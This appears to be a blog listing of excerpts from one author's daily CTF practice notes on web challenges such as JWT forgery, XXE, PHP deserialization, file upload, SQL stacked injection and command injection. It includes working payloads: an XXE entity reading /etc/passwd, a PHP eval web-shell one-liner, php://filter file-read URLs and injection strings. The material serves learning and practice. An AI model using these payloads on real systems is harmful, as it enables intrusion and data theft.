CTF
文章平均质量分 59
、Ange射手
这个作者很懒,什么都没留下…
展开
-
CTF第十五天
JSON Web Token关于JWT,下面是一些资料添加链接描述添加链接描述简单来说,就是身份验证的payload敏感信息泄露1.随便登录一个账号后再网页工具的“网络”查看token2.解密添加链接描述3.将上面和下面拼成flag值就行无签名1.在pycharm中加入pyjwt库,下面是安装教程添加链接描述2.运行以下脚本import jwtpayload={ "username": "admin", "password": "admin", "role":原创 2021-08-29 11:30:46 · 416 阅读 · 0 评论 -
CTF第十四天
CTF第十四天太久没写了,今天挑战下题目LD_PRELOAD太久没整了,我都忘了PHP是啥,再复习一遍。PHP是一种能在服务器端执行的脚本语言,也可嵌入到HTML中看到这个提示,先来了解下Linux LD_PRELOAD环境变量这里有关于动态链接库的详解和Linux LD_PRELOAD环境变量简介动态链接库详解【一】linux 环境变量LD_PRELOAD简介 定义优先加载的动态链接库了解了这些,大概就能知道这题的原理了原理:php部分函数在执行的时候会加载动态库里面的函数,而LD_原创 2021-08-28 22:22:13 · 880 阅读 · 0 评论 -
CTF第十三天
[NCTF2019]True XML cookbook前几天学了XXE注入,今天试试进去后是一个登录界面,随便登一下抓包,发现POST那熟悉的XML的格式拿之前练习的Payload来试试<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><user><username>&xxe;&l原创 2021-06-07 17:04:03 · 132 阅读 · 1 评论 -
CTF第十二天
[安洵杯 2019]easy_serialize_php前几天学了点反序列化,今天练练手简单地说下序列化和反序列化后的格式序列化后的结果是一串字符串。反序列化会解开序列化的字符串生成相应类型的数据。<?php$function = @$_GET['f'];//得到f传入的参数//对输入的$img参数进行检验function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g');//定义一些字符原创 2021-06-05 12:23:44 · 168 阅读 · 1 评论 -
CTF第十一天
[GXYCTF2019]BabyUpload 1先上传一个.htaccess文件,它可以把之后传的文件当作php文件解析,文件的内容SetHandler application/x-httpd-php把Content—Type改成image/jpeg再上传一个jpg类型的一句话木马<script language="php">eval($_POST['shell']);</script>拼接下路径http://8c859d42-abd9-4cc8-a633-原创 2021-06-04 09:04:09 · 155 阅读 · 0 评论 -
CTF第十天
MD5 1下载文件得到密文e00cf25ad42683b3df678c61f42c6bda拿去md5解密,写成flag{admin1}即可Url编码 1下载密文,放在burp中url解码就行一眼就解密看到密文最后有个等号,猜想是base64解码,试试看看我回旋踢密文synt{5pq1004q-86n5-46q8-o720-oro5on0417r1}猜出前面那个肯定是flag这个单词,列个字母表数数看,发现果然都偏移了13位,是凯撒加密摩丝文件里有一段摩斯密码,解密解密网站原创 2021-06-03 17:04:43 · 151 阅读 · 0 评论 -
CTF第九天
[安洵杯 2019]easy_web 11.打开页面,查看源码,有一个提示md5的看看url,有个cmd,和一个img的密文在burp上进行两次base64解密和一次ascii hex解密后得到,555.png,由此我们知道了文件的加密方法,我们将index.php进行ascii hex加密和两次base64加密后得到TmprMlpUWTBOalUzT0RKbE56QTJPRGN3构造url/index.php?img=TmprMlpUWTBOalUzT0RKbE56QTJPRGN3&c原创 2021-06-02 17:41:03 · 284 阅读 · 3 评论 -
CTF第八天
[BSidesCF 2020]Had a bad day 1可能存在SQL注入或者文件包含,试试用filter伪协议读取index.php文件/index.php?category=php://filter/read=convert.base64-encode/resource=index.php报错了的确是文件包含,但是有index.php却读取错误,报错显示无法打开流:操作失败,结果把.php后缀去掉,可以读取/index.php?category=php://filter/read=c原创 2021-06-01 16:02:57 · 372 阅读 · 2 评论 -
CTF第七天
[强网杯 2019]随便注 1先打这个1' and 1=1#和1' and 1=2#返回结果不同,说明有sql注入再打1' or 1=1#虽然不知道这些信息有啥用再看看有几列当输入1' order by 3#时返回了报错信息,说明只有2列接下来试试堆叠注入堆叠注入原理在sql中,分号表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以被执行,继续加一个分号和一条语句,这样就可以在一次数据库的调用中执行多个语句。mysql> select * from user原创 2021-05-31 17:58:16 · 187 阅读 · 0 评论 -
CTF第六天
[BJDCTF2020]Easy MD5 1提示了后台的查询语句select * from 'admin' where password=md5($pass,true)这里关键是理解md5($pass,true)是个啥东西md5($pass,true)在指定true的时候,是返回的原始 16 字符二进制格式。也就是说会返回这样子的字符串:'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c这样的二进制字符原创 2021-05-30 09:50:13 · 124 阅读 · 0 评论 -
CTF第五天
[ACTF2020 新生赛]Upload 1上传一个普通的txt文件,发现只有图像类型的文件才能传上去,看看有没有前端的检验,看看源码,发现有一个onsubmit:“return checkFIle()”的动作和函数,把他删掉就可以上传普通的txt文件上传一个一句话木马,发现被ban了,猜测有后端的检测尝试更改文件后缀名来绕过,于是发现.phtml后缀可以绕过用蚁剑连接来得到flag<script language="php">eval($_POST['shell']);<原创 2021-05-28 10:05:01 · 106 阅读 · 0 评论 -
CTF第四天
[极客大挑战 2019]Http 1查看源码,发现一个Secret.php路径,点进去发现我们的请求必须得来自https://www.Sycsecret.com我们可以使用Referer头来伪造链接来源,这时他是要用Syclover的浏览器这是referer头的参考我们再在User-Agent中修改浏览器的种类,返回说只能从本地打开文件X-Forwarded-For头来操作X-Forwarded-For参考简单来说,X-Forwarded-For头可以检测发送请求的IP地址和其经过的原创 2021-05-27 18:23:44 · 194 阅读 · 0 评论 -
CTF第三天
[极客大挑战 2019]Knife 1进去以后,看到这个页面,猜想要用蚁剑例//eval — 把字符串bai作为PHP代码执行 eval('echo 123;');//输出123eval($_POST["Syc"]);//上传一个字符串Sys打开蚁剑,添加URL,密码为Sys连接后在根目录找到flag[GXYCT[GXYCTF2019]Ping Ping Ping 1进去后看到这个一个查询ip的格式,我们可以用这个来输入命令首先输入/?ip=127.0.0.1|ls,发现了原创 2021-05-26 09:42:01 · 461 阅读 · 0 评论 -
CTF第二天
[RoarCTF 2019]Easy Calc 1进去后是一个计算器,查看源码,发现了一个路径calc.php进去calc.php看看,有一串代码再看看calc.php?num=7*7,是可以计算结果的但是参数不是数字就不行WAF的问题:WAF不允许num传入字母,那我们可以在num前加个空格来绕过WAF这里利用PHP的字符串解析特性来绕过WAF,如calc.php? num=phpinfo();参考扫根目录下的所有文件,也就是scandir("/")但是/被过滤了,于是用c原创 2021-05-25 19:53:22 · 140 阅读 · 0 评论 -
CTF
[ACTF2020 新生赛]Include1打开网页,点击tips,跳转到了另一个地址,观察了下网址,有一个文件包含/?file=php://filter/read=convert.base64-encode/resource=flag.php用base64解码1.格式2.打开方式,也就是读(read)或写(write)3.是过滤器。主要有四种:字符串过滤器,转换过滤器,压缩过滤器,加密过滤器。filter里可以用一或多个过滤器(中间用|隔开),这也为解题提供了多种方法,灵活运用过滤器原创 2021-05-24 21:07:02 · 347 阅读 · 0 评论 -
CTF
[HCTF 2018]WarmUp1.代码审计查看源码,发现source.php有文件2.访问文件路径,跳转到一个代码页面,本来我以为hint.php文件路径中也有,但被骗了原创 2021-05-24 17:28:46 · 83 阅读 · 0 评论 -
CTF-简单的加密解密
CTF-简单的加密解密最近遇上了一到ctf的比赛题,所以记录下来。1.下载附件2.打开后发现是验证flag值的一个程序,猜想要用反编译的软件,Easy Python Decompiler获取源码3.分析代码# Embedded file name: 2.py import base64def encode(yourflag): #对输入的flag进行加密 s = '' #将输入的flag拆成单个的字符 fo原创 2021-05-17 17:35:13 · 12945 阅读 · 0 评论